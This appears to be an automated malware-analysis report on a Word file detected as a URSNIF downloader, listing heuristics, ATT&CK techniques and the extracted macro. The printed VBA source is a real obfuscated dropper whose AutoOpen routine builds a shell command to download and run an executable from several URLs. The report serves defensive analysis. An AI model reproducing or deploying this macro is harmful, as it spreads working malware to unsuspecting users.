MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. It contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is likely used to execute a command that downloads and runs a secondary payload, a common technique for malware droppers. The macro's obfuscated string concatenation suggests an attempt to hide the actual command being executed.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5508 bytes |
SHA-256: fde7c1c4506a29147546f1c5238ca313a6ac36f9ca749f41883f8da518d4a3b3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aDrJnizn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "qBtYd" + "NkaGQmH"
Hour "O" + "YMwnJEXBBsU" + "3632" + "FRHK"
VBA.Shell CleanString(m) + mvNwWodN + GKkisiK + wifnsAfH + iDQhwXN + QXJizaPN + AiZaZiQkOkSASV + aDsiEuQqJd, 34 - 34
Hour "aXK" + "7012" + "P" + "2107"
Hour "NUo" + "FD" + "cNC" + "pmGSaRi"
Hour "6581" + "mtdrGr"
Hour "532441974" + "S"
Hour "3051" + "125150513" + "vO" + "wUHa"
End Sub
Attribute VB_Name = "AfncHpakfb"
Function wifnsAfH()
On _
Error _
Resume _
Next
Hour "3109" + "ijdCMEHOvVrdO" + "IkBFoFoY" + "61107832"
Hour "fNnWlYfd" + "cRkQ"
Hour "229346390" + "388026885"
Hour "RPAzuGfN" + "182793583"
Hour "zw" + "RXGJDolzDJT"
jrpwfCa = "cm" + "d /V^:" + "^ON/C" + Chr(1 + 3 + 3 + 4 + 23) + "^" + "s^et ^" + "l^t" + "n=^ " + " " + " ^"
Hour "nK" + "wfTP"
Hour "5601" + "Y"
EjzzT = " ^" + " ^ " + " ^ ^ }" + "^}^{" + "^hct" + "ac^}" + "^;" + "ka"
Hour "1053" + "177923006" + "wKpvIuvzU" + "437827964"
Hour "373578485" + "VJLmnd" + "fNCSRC" + "ulzR"
Hour "wl" + "2171"
ZlIjTDcm = "^erb" + "^;" + "^A^z" + "^" + "H"
Hour "TYfv" + "423644178"
Hour "bsq" + "sCakK"
Hour "So" + "wuiuEBNSjC"
Hour "8956" + "336244354"
VqWkbmdJdi = "$ me^t^" + "I^" + "-" + "ek^ovn" + "^" + "I^;" + ")^A^z" + "^H$ " + ",WRv^$" + "(^el" + "^i^" + "Fd" + "a^"
Hour "7764" + "Blf"
Hour "VK" + "dEXmIstXhiBc"
Ariwnsh = "o" + "^ln^w" + "^o^D^." + "HjM$^{" + "^yrt{)^" + "p" + "m" + "^" + "U" + "$ n^i^" + " ^"
Hour "292822983" + "4289"
Hour "TqFs" + "321947025"
ulHCXmVtF = "WRv$(" + "^hcaer^" + "o^" + "f^;^'" + "^" + "e^xe" + "^.^'^+" + "X" + "iS$+'"
wifnsAfH = jrpwfCa + EjzzT + ZlIjTDcm + VqWkbmdJdi + Ariwnsh + ulHCXmVtF
Hour "Oo" + "239607807"
Hour "Q" + "bdhLownSq" + "9603" + "328933618"
Hour "NOJEqW" + "QRm"
Hour "jMd" + "66"
End Function
Function iDQhwXN()
On _
Error _
Resume _
Next
Hour "74940547" + "wqq" + "qFE" + "RZ"
Hour "118865102" + "4126"
Hour "IsuT" + "W" + "49353529" + "uJ"
Hour "OkLb" + "UZX" + "1725" + "fP"
Hour "dFvLrzR" + "bEsLqEPQtC"
Hour "6127" + "PLTt" + "UF" + "GWZWlzRzApDYW"
qzpfcYfwDc = "^\^" + "'+c" + "i^l^" + "bu^p:vn" + "e" + "^$" + "=" + "^Az^H^$" + ";^'^36" + "7^' =^" + " XiS$;" + ")'@^"
Hour "1938" + "7292"
Hour "F" + "nHpc" + "3173" + "3588"
Hour "29886437" + "IWmWWE" + "7174" + "X"
czUjFW = "'(" + "t^i" + "^lp" + "^S.'" + "rx^" + "iQyXY"
Hour "EI" + "szajwArWUQcpjH"
Hour "7238" + "IRj" + "102550016" + "2523"
UkzawwQf = "/m" + "^oc." + "u" + "l^g^osi" + "r^a^fs" + "ir^a"
Hour "21615936" + "2648"
qElSXvN = "f//^:^" + "p" + "^t" + "^t" + "^" + "h@b" + "z^" + "9xL^i^" + "Q^e" + "4/^mo" + "c^.^tn^" + "emanru"
Hour "453197111" + "9392" + "CSTHwLiTC" + "1390"
pYGJF = "ot" + "^lla^br" + "egn^e" + "^ll^a^" + "hc//^:^" + "p" + "^t^" + "th^" + "@^J^5mn" + "G8^MU" + "/nc" + "^.e^"
Hour "529741019" + "hIdidlCVuhUw" + "6702" + "EJzYtvn"
Hour "ifjjaIiI" + "1313"
Hour "506" + "Euh" + "4836" + "406231646"
kWwCNfEi = "s^ac^u" + "i" + "n//:^p" + "t^t^h^@" + "^86x" + "^y^2c" + "nl/^" + "gro" + ".^a^l" + "^" + "a" + "n-^awi^" + "j^.^orp"
Hour "1284" + "YJhLPhGw" + "7993" + "427508345"
Hour "nltsttWI" + "aHi"
Hour "lRCz" + "V" + "VUsC" + "vIMPNFiwCu"
iYkadRXOC = "^j//:pt" + "^th@L^l" + "0^Ou" + "g^PI" + "^"
Hour "9514" + "5387"
Hour "ohb" + "pvrF" + "130290933" + "LR"
RuafMq = "b/" + "t^i^." + "^omr" + "elap^" + ".^i" + "^sec" + "^o^i^di"
Hour "i" + "jjVQqidmo" + "Pc" + "7446"
Hour "7641" + "VtX"
MBHNUoqFNot = "cr^a" + "^.^e" + "^" + "p^p^e" + "^sui" + "^g^a" + "^i" + "r^a^mu"
Hour "241069210" + "263517539" + "N" + "8279"
Hour "4864" + "5192" + "5008" + "SHhcj"
Hour "nWfP" + "6112"
Hour "dhKzvAZENbWWt" + "502561866"
dEzdsh = "s^eg/" + "/:p" + "tth
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.